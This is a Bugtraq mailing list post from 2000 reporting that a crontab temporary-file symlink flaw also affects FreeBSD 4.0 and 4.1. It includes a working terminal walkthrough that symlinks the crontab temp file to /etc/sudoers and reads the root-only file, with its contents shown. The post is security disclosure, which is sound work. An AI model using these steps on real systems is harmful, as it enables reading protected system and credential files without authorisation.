Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability

From: Sergey Nenashev <alf () ISD MEMONET RU>
Date: Tue, 24 Oct 2000 20:55:29 +0400
Hi,

Tested on
4.0-RELEASE FreeBSD 4.0-RELEASE #9
4.1-RELEASE FreeBSD 4.1-RELEASE #1:


Can read any file wich start with comment simbol (#)



$ ls -l /etc/sudoers
-r--------  1 root  wheel  313 24 oct 20:20 /etc/sudoers
$ id
uid=1002(alf) gid=1002(alf) groups=1002(alf)


$ crontab -e
~
~
~
/tmp/crontab.hLmjTbK417
:!sh

[ ####  Make simbolik link]

rm /tmp/crontab.hLmjTbK417
ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
exit


[ #### quit vi ]
/tmp/crontab.hLmjTbK417
crontab: installing new crontab

[ #### start crontab editor]

$ crontab -e
[#######   See in vi]
# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the sudoers man page for the details on how to write a sudoers
file.
#

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL) ALL
alf     ALL=(ALL) ALL
~
~
~




If file started with no # then crontab sad

"/tmp/crontab.GAeNMP1357":2: bad minute
crontab: errors in crontab file, can't install




--
------
Alf Delems<alf () isd memonet ru>
Previous By Date Next
Previous By Thread Next

Current thread: